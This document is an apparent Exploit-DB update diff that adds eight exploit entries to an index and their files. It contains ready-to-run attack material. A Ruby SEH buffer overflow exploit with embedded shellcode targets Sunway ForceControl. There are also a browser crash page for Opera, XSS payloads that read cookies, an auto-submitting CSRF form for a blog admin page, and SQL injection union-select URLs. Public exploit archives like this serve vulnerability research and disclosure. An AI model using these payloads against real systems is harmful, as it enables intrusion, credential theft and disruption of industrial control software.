Update: 2015-01-23

8 new exploits

files.csv

@@ -32192,7 +32192,7 @@ id,file,description,date,author,platform,type,port
 35730,platforms/php/webapps/35730.txt,"WordPress Shopping Cart 3.0.4 - Unrestricted File Upload",2015-01-08,"Kacper Szurek",php,webapps,80
 35731,platforms/php/remote/35731.rb,"Pandora v3.1 - Auth Bypass and Arbitrary File Upload Vulnerability",2015-01-08,metasploit,php,remote,80
 35732,platforms/multiple/local/35732.py,"Ntpdc 4.2.6p3 - Local Buffer Overflow",2015-01-08,drone,multiple,local,0
-35733,platforms/php/webapps/35733.txt,"vBulletin MicroCART 1.1.4 - Arbitrary File(s) Deletion, SQL Injection & XSS",2015-01-09,Dave,php,webapps,80
+35733,platforms/php/webapps/35733.txt,"vBulletin MicroCART 1.1.4 - Arbitrary File(s) Deletion, SQL Injection & XSS",2015-01-09,Technidev,php,webapps,80
 35734,platforms/php/webapps/35734.txt,"ZAPms 1.22 'nick' Parameter SQL Injection Vulnerability",2011-05-09,KedAns-Dz,php,webapps,0
 35735,platforms/multiple/remote/35735.txt,"Apache Struts 2.x XWork 's:submit' HTML Tag Cross Site Scripting Vulnerability",2011-05-10,"Dr. Marian Ventuneac",multiple,remote,0
 35736,platforms/php/webapps/35736.txt,"poMMo Aardvark PR16.1 Multiple Cross Site Scripting Vulnerabilities",2011-05-10,"High-Tech Bridge SA",php,webapps,0
@@ -32303,3 +32303,11 @@ id,file,description,date,author,platform,type,port
 35853,platforms/php/webapps/35853.php,"Phpnuke 8.3 'upload.php' Arbitrary File Upload Vulnerability (1)",2011-06-13,pentesters.ir,php,webapps,0
 35854,platforms/php/webapps/35854.pl,"Phpnuke 8.3 'upload.php' Arbitrary File Upload Vulnerability (2)",2011-06-13,pentesters.ir,php,webapps,0
 35855,platforms/php/remote/35855.txt,"PHP <= 5.3.6 Security Bypass Vulnerability",2011-06-14,"Krzysztof Kotowicz",php,remote,0
+35856,platforms/multiple/dos/35856.html,"Opera Web Browser 11.11 Denial of Service Vulnerability",2011-06-14,echo,multiple,dos,0
+35861,platforms/php/webapps/35861.txt,"vBTube 1.2.9 'vBTube.php' Multiple Cross Site Scripting Vulnerabilities",2011-06-14,Mr.ThieF,php,webapps,0
+35862,platforms/php/webapps/35862.txt,"miniblog 1.0 Multiple Cross Site Scripting Vulnerabilities",2011-06-15,"High-Tech Bridge SA",php,webapps,0
+35863,platforms/php/webapps/35863.php,"myBloggie 2.1.6 HTML-injection and SQL Injection Vulnerabilities",2011-06-15,"Robin Verton",php,webapps,0
+35864,platforms/windows/remote/35864.txt,"Sunway ForceControl 6.1 Multiple Heap Based Buffer Overflow Vulnerabilities",2011-06-17,"Dillon Beresford",windows,remote,0
+35865,platforms/php/webapps/35865.txt,"Nibbleblog Multiple SQL Injection Vulnerabilities",2011-06-19,KedAns-Dz,php,webapps,0
+35866,platforms/php/webapps/35866.txt,"Immophp 1.1.1 Cross Site Scripting and SQL Injection Vulnerabilities",2011-06-18,KedAns-Dz,php,webapps,0
+35867,platforms/php/webapps/35867.txt,"Taha Portal 3.2 'sitemap.php' Cross Site Scripting Vulnerability",2011-06-18,Bl4ck.Viper,php,webapps,0

platforms/multiple/dos/35856.html

@@ -0,0 +1,34 @@
+source: http://www.securityfocus.com/bid/48262/info
+
+The Opera Web Browser is prone to a denial-of-service vulnerability.
+
+An attacker can exploit this issue to crash the affected application, denying service to legitimate users.
+
+Opera Web Browser 11.11 is vulnerable; other versions may also be affected. 
+
+<html>
+  <body>
+   <iframe src=&#039;about:blank&#039; id=&#039;bo0om&#039; style="width:0px;height:0px;border:0px none;"></iframe>
+   <script type="text/javascript"  language="javascript">
+   
+    /*
+    *              
+    * Opera 11.11 Remote  Crash
+    * Software link: http://www.opera.com/download/
+    * Tested on: Win32 xp home sp 3   
+    * CVE : null
+    *        
+    * Im too lazy to deep analyze this ,but i thing is just unexploitable crash
+    * so f****jixvt
+    *      ( dla klechis?awa i jego kosiarki :i )
+    *   
+    */               
+   
+      var a = window.document.getElementById(&#039;bo0om&#039;);
+      var b = a.contentDocument.createElement(&#039;font&#039;);
+      a.src=&#039;about:blank&#039;;
+      setTimeout(&#039;b.face = "h3h";&#039;,500);
+       
+   </script>
+  </body>
+</html>

platforms/php/webapps/35861.txt

@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/48280/info
+
+vBTube is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+vBTube 1.2.9 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/cy/vBTube.php?page=1&do=user&uname="><script>alert(1);</script> 
+http://www.example.com/forum/vBTube.php?do=view&vidid=%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E

platforms/php/webapps/35862.txt

@@ -0,0 +1,32 @@
+source: http://www.securityfocus.com/bid/48281/info
+
+miniblog is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+miniblog 1.0.0 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/adm/list.php?post_list=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
+
+http://www.example.com/adm/login.php?error_text=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
+
+http://www.example.com/adm/options.php?response_text=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
+
+http://www.example.com/adm/password.php?response_text=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
+
+http://www.example.com/adm/edit.php?response_text=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
+http://www.example.com/adm/edit.php?mode=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
+
+
+<form action="http://www.example.com/adm/admin.php?mode=add&id=" method="post">
+<input type="hidden" name="data[post_title]" value="csrf">
+<input type="hidden" name="data[post_content]" value="csrf">
+<input type="hidden" name="data[published]" value="1">
+<input type="hidden" name="miniblog_PostBack" value="Add">
+<input type="submit" id="btn">
+</form>
+<script>
+document.getElementById(&#039;btn&#039;).click();
+</script>
+
+

platforms/php/webapps/35863.php

@@ -0,0 +1,27 @@
+source: http://www.securityfocus.com/bid/48317/info
+
+myBloggie is prone to a SQL-injection vulnerabilities and an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied input.
+
+An attacker may leverage these issues to compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, or execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials, control how the site is viewed, and launch other attacks.
+
+myBloggie 2.1.6 is vulnerable; other versions may also be affected. 
+
+<?php
+//trackback.php - Line 33 - 35
+$url=urldecode($_REQUEST['url']);
+if (validate_url($url)==false) { $tback->trackback_reply(1, "<p>Sorry, Trackback failed.. Reason : URL not valid</p>"); }
+
+?>
+
+
+<?php
+//trackback.php - Line 750
+function validate_url($url) {
+    if  ( ! preg_match('#^http\\:\\/\\/[a-z0-9\-]+\.([a-z0-9\-]+\.)?[a-z]+#i', $url, $matches) ) {
+       return false;
+    } else {
+       return true;  
+    }
+} 
+?>
+

platforms/php/webapps/35865.txt

@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/48339/info
+
+Nibbleblog is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.
+
+A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
+
+Nibbleblog 3.0 is affected; other versions may also be vulnerable. 
+
+http://www.example.com/index.php?page=[SQLi]
+http://www.example.com/post.php?idpost=[SQLi] 

platforms/php/webapps/35866.txt

@@ -0,0 +1,17 @@
+source: http://www.securityfocus.com/bid/48341/info
+
+Immophp is prone to a cross-site scripting vulnerability and multiple SQL-injection vulnerabilities because the application fails to sufficiently sanitize user-supplied input.
+
+Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Immophp 1.1.1 is vulnerable; other versions may also be affected. 
+
+SQL-injection:
+
+http://www.example.com/index.php?page=-2%20uniuon%20select%201,2,3,version(),5--
+http://www.example.com/annonce_detail.php?annonce=-2%20union%20all%20select%20group_concat(table_name)%20from%20information_schema.tables%20where%
+
+Cross-site scripting:
+
+http://www.example.com/annonce.php?secteur= %3cscript%3ealert%3c'31337'%3e%3b%3c%2fscript%3e
+

platforms/php/webapps/35867.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/48342/info
+
+Taha Portal is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Taha Portal 3.2 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/index.asp?id=3&serword=%3Cscript%3Ealert%28%22sss%22%29;%3C/script%3E

platforms/windows/remote/35864.txt

@@ -0,0 +1,53 @@
+source: http://www.securityfocus.com/bid/48328/info
+
+Sunway ForceControl is prone to multiple heap-based buffer-overflow vulnerabilities because the application fails to perform adequate boundary checks on user-supplied data.
+
+Attackers can exploit these issues to execute arbitrary code on the affected device. Failed exploit attempts will result in a denial-of-service condition.
+
+def send(packet)
+    begin
+        sock = TCPSocket.new(@ip, @port)
+        sock.write(packet)
+    rescue Exception => e
+        return false
+    else
+        resp = sock.recv(1024)
+        sock.close
+         
+        return true
+    end
+end
+ 
+@ip = ARGV[0]
+@port = 80
+ 
+# windows/exec CMD=calc.exe
+shellcode = "\xb8\xd5\x45\x06\xc4\xda\xde\xd9\x74\x24\xf4\x5b\x33\xc9" +
+            "\xb1\x33\x31\x43\x12\x03\x43\x12\x83\x3e\xb9\xe4\x31\x3c" +
+            "\xaa\x60\xb9\xbc\x2b\x13\x33\x59\x1a\x01\x27\x2a\x0f\x95" +
+            "\x23\x7e\xbc\x5e\x61\x6a\x37\x12\xae\x9d\xf0\x99\x88\x90" +
+            "\x01\x2c\x15\x7e\xc1\x2e\xe9\x7c\x16\x91\xd0\x4f\x6b\xd0" +
+            "\x15\xad\x84\x80\xce\xba\x37\x35\x7a\xfe\x8b\x34\xac\x75" +
+            "\xb3\x4e\xc9\x49\x40\xe5\xd0\x99\xf9\x72\x9a\x01\x71\xdc" +
+            "\x3b\x30\x56\x3e\x07\x7b\xd3\xf5\xf3\x7a\x35\xc4\xfc\x4d" +
+            "\x79\x8b\xc2\x62\x74\xd5\x03\x44\x67\xa0\x7f\xb7\x1a\xb3" +
+            "\xbb\xca\xc0\x36\x5e\x6c\x82\xe1\xba\x8d\x47\x77\x48\x81" +
+            "\x2c\xf3\x16\x85\xb3\xd0\x2c\xb1\x38\xd7\xe2\x30\x7a\xfc" +
+            "\x26\x19\xd8\x9d\x7f\xc7\x8f\xa2\x60\xaf\x70\x07\xea\x5d" +
+            "\x64\x31\xb1\x0b\x7b\xb3\xcf\x72\x7b\xcb\xcf\xd4\x14\xfa" +
+            "\x44\xbb\x63\x03\x8f\xf8\x9c\x49\x92\xa8\x34\x14\x46\xe9" +
+            "\x58\xa7\xbc\x2d\x65\x24\x35\xcd\x92\x34\x3c\xc8\xdf\xf2" +
+            "\xac\xa0\x70\x97\xd2\x17\x70\xb2\xb0\xf6\xe2\x5e\x19\x9d" +
+            "\x82\xc5\x65"
+             
+payload = "H" * 1599
+payload << "\xeb\x06\x90\x90" # Pointer to Next SE Handler
+payload << [0x719737FA].pack("V*") # SEH Handler - p/p/r
+payload << "\x90" * 40
+payload << shellcode
+payload << "\x90" * (4058 - shellcode.length)
+ 
+pack = "GET /#{payload} HTTP/1.1\r\n"
+pack << "Host: http://#{@ip}:#{@port}\r\n\r\n"
+ 
+puts "packet sended." if send(pack)